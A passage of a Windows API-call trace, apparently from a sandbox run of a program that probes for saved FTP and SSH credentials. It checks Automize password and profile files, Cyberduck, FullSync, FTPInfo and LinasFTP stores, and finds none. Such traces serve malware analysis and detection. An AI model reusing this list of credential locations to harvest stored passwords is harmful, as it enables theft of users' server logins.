dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.864] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 0 [0244.865] GetProcessHeap () returned 0x740000 [0244.865] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.865] GetProcessHeap () returned 0x740000 [0244.865] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.866] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.867] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 64 [0244.867] GetProcessHeap () returned 0x740000 [0244.867] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.867] GetProcessHeap () returned 0x740000 [0244.868] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.869] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.869] GetProcessHeap () returned 0x740000 [0244.870] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.870] GetProcessHeap () returned 0x740000 [0244.870] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.871] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.872] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0244.872] GetProcessHeap () returned 0x740000 [0244.872] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75a488 [0244.872] GetProcessHeap () returned 0x740000 [0244.872] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.873] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.874] GetProcessHeap () returned 0x740000 [0244.874] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.874] GetProcessHeap () returned 0x740000 [0244.874] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.875] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.876] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 44 [0244.876] GetProcessHeap () returned 0x740000 [0244.876] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a488 [0244.876] GetProcessHeap () returned 0x740000 [0244.876] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.877] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 0 [0244.878] GetProcessHeap () returned 0x740000 [0244.878] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.878] GetProcessHeap () returned 0x740000 [0244.879] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.880] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.881] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 65 [0244.881] GetProcessHeap () returned 0x740000 [0244.881] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0244.881] GetProcessHeap () returned 0x740000 [0244.882] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.883] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.883] GetProcessHeap () returned 0x740000 [0244.883] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.883] GetProcessHeap () returned 0x740000 [0244.883] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.884] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.885] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0244.885] GetProcessHeap () returned 0x740000 [0244.885] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0244.885] GetProcessHeap () returned 0x740000 [0244.885] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.886] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.887] GetProcessHeap () returned 0x740000 [0244.887] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.887] GetProcessHeap () returned 0x740000 [0244.887] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.888] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.888] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 44 [0244.889] GetProcessHeap () returned 0x740000 [0244.889] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a488 [0244.889] GetProcessHeap () returned 0x740000 [0244.889] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.890] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 0 [0244.891] GetProcessHeap () returned 0x740000 [0244.891] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.891] GetProcessHeap () returned 0x740000 [0244.891] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.892] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.933] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 65 [0244.933] GetProcessHeap () returned 0x740000 [0244.933] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0244.933] GetProcessHeap () returned 0x740000 [0244.934] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.935] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0244.935] GetProcessHeap () returned 0x740000 [0244.935] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.935] GetProcessHeap () returned 0x740000 [0244.935] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.936] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.937] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0244.937] GetProcessHeap () returned 0x740000 [0244.937] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0244.937] GetProcessHeap () returned 0x740000 [0244.937] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.939] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0244.939] GetProcessHeap () returned 0x740000 [0244.939] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.941] GetProcessHeap () returned 0x740000 [0244.941] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0244.993] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.994] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 44 [0244.994] GetProcessHeap () returned 0x740000 [0244.994] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a488 [0244.994] GetProcessHeap () returned 0x740000 [0244.995] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0244.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0244.996] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 0 [0244.996] GetProcessHeap () returned 0x740000 [0244.997] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0244.997] GetProcessHeap () returned 0x740000 [0244.997] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0244.998] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0244.999] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 65 [0244.999] GetProcessHeap () returned 0x740000 [0244.999] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0244.999] GetProcessHeap () returned 0x740000 [0244.999] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.000] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0245.001] GetProcessHeap () returned 0x740000 [0245.001] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.001] GetProcessHeap () returned 0x740000 [0245.001] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0245.002] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.003] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0245.003] GetProcessHeap () returned 0x740000 [0245.003] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0245.003] GetProcessHeap () returned 0x740000 [0245.004] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.005] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0245.005] GetProcessHeap () returned 0x740000 [0245.006] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.006] GetProcessHeap () returned 0x740000 [0245.006] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0245.007] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.008] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 44 [0245.008] GetProcessHeap () returned 0x740000 [0245.008] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a488 [0245.008] GetProcessHeap () returned 0x740000 [0245.008] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.009] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 0 [0245.010] GetProcessHeap () returned 0x740000 [0245.010] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.010] GetProcessHeap () returned 0x740000 [0245.010] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0245.011] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.012] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 65 [0245.012] GetProcessHeap () returned 0x740000 [0245.012] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0245.012] GetProcessHeap () returned 0x740000 [0245.012] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.013] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0245.013] GetProcessHeap () returned 0x740000 [0245.014] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.014] GetProcessHeap () returned 0x740000 [0245.014] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0245.015] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.016] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0245.016] GetProcessHeap () returned 0x740000 [0245.016] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0245.016] GetProcessHeap () returned 0x740000 [0245.016] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.017] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0245.018] GetProcessHeap () returned 0x740000 [0245.018] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.018] GetProcessHeap () returned 0x740000 [0245.018] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75b4b8 [0245.019] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.020] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 44 [0245.020] GetProcessHeap () returned 0x740000 [0245.020] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x5c) returned 0x75a488 [0245.020] GetProcessHeap () returned 0x740000 [0245.020] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.021] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 0 [0245.022] GetProcessHeap () returned 0x740000 [0245.022] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.022] GetProcessHeap () returned 0x740000 [0245.022] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0245.084] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.085] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 65 [0245.085] GetProcessHeap () returned 0x740000 [0245.085] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0245.085] GetProcessHeap () returned 0x740000 [0245.085] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.087] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0245.087] GetProcessHeap () returned 0x740000 [0245.088] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.088] GetProcessHeap () returned 0x740000 [0245.088] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f8e) returned 0x75b4b8 [0245.129] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.130] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0245.130] GetProcessHeap () returned 0x740000 [0245.130] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x86) returned 0x75a488 [0245.130] GetProcessHeap () returned 0x740000 [0245.131] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.132] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0245.132] GetProcessHeap () returned 0x740000 [0245.133] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.133] GetProcessHeap () returned 0x740000 [0245.133] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.134] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.134] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0245.134] GetProcessHeap () returned 0x740000 [0245.134] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f58) returned 0x75b4b8 [0245.135] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.136] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\Cyberduck", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 47 [0245.136] GetProcessHeap () returned 0x740000 [0245.136] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x62) returned 0x75a698 [0245.136] GetProcessHeap () returned 0x740000 [0245.137] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.138] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 0 [0245.138] GetProcessHeap () returned 0x740000 [0245.139] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.139] GetProcessHeap () returned 0x740000 [0245.139] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.139] GetProcessHeap () returned 0x740000 [0245.139] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.140] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.141] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0245.141] GetProcessHeap () returned 0x740000 [0245.141] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75b4b8 [0245.142] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.142] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\iterate_GmbH", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 50 [0245.143] GetProcessHeap () returned 0x740000 [0245.143] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x68) returned 0x75a698 [0245.143] GetProcessHeap () returned 0x740000 [0245.143] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.144] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 0 [0245.145] GetProcessHeap () returned 0x740000 [0245.145] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.145] GetProcessHeap () returned 0x740000 [0245.146] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.146] GetProcessHeap () returned 0x740000 [0245.146] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.147] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.147] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0245.150] GetProcessHeap () returned 0x740000 [0245.150] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x75b4b8 [0245.151] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.152] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\.config\\fullsync\\profiles.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 51 [0245.152] GetProcessHeap () returned 0x740000 [0245.152] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6a) returned 0x75a698 [0245.152] GetProcessHeap () returned 0x740000 [0245.153] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.154] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 0 [0245.154] GetProcessHeap () returned 0x740000 [0245.154] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a698 | out: hHeap=0x740000) returned 1 [0245.154] GetProcessHeap () returned 0x740000 [0245.154] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.155] GetProcessHeap () returned 0x740000 [0245.155] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f72) returned 0x75b4b8 [0245.155] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.156] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\FTPInfo\\ServerList.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 60 [0245.156] GetProcessHeap () returned 0x740000 [0245.156] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7c) returned 0x75a488 [0245.156] GetProcessHeap () returned 0x740000 [0245.157] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.158] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.158] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 0 [0245.158] GetProcessHeap () returned 0x740000 [0245.158] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.158] GetProcessHeap () returned 0x740000 [0245.159] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f72) returned 0x75b4b8 [0245.194] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0245.195] wvsprintfW (in: param_1=0x75b4b8, param_2="%s\\FTPInfo\\ServerList.cfg", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 60 [0245.195] GetProcessHeap () returned 0x740000 [0245.195] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7c) returned 0x75a488 [0245.195] GetProcessHeap () returned 0x740000 [0245.196] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b4b8 | out: hHeap=0x740000) returned 1 [0245.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0245.197] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 0 [0245.197] GetProcessHeap () returned 0x740000 [0245.198] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.198] GetProcessHeap () returned 0x740000 [0245.198] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e8) returned 0x75a488 [0245.198] GetProcessHeap () returned 0x740000 [0245.198] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74ba10 [0245.198] GetProcessHeap () returned 0x740000 [0245.198] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5e0 [0245.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0245.200] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\LinasFTP\\Site Manager", phkResult=0x75b5e0 | out: phkResult=0x75b5e0*=0x0) returned 0x2 [0245.239] GetProcessHeap () returned 0x740000 [0245.239] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5e0 | out: hHeap=0x740000) returned 1 [0245.239] GetProcessHeap () returned 0x740000 [0245.239] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0245.239] GetProcessHeap () returned 0x740000 [0245.239] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ba10 | out: hHeap=0x740000) returned 1 [0245.239] GetProcessHeap () returned 0x740000 [0245.239] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0245.240] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0245.241] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0245.241] GetProcessHeap () returned 0x740000 [0245.241] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f74) returned 0x75b6c0 [0245.242] LoadLibraryW (lpLibFileName="user32") returned 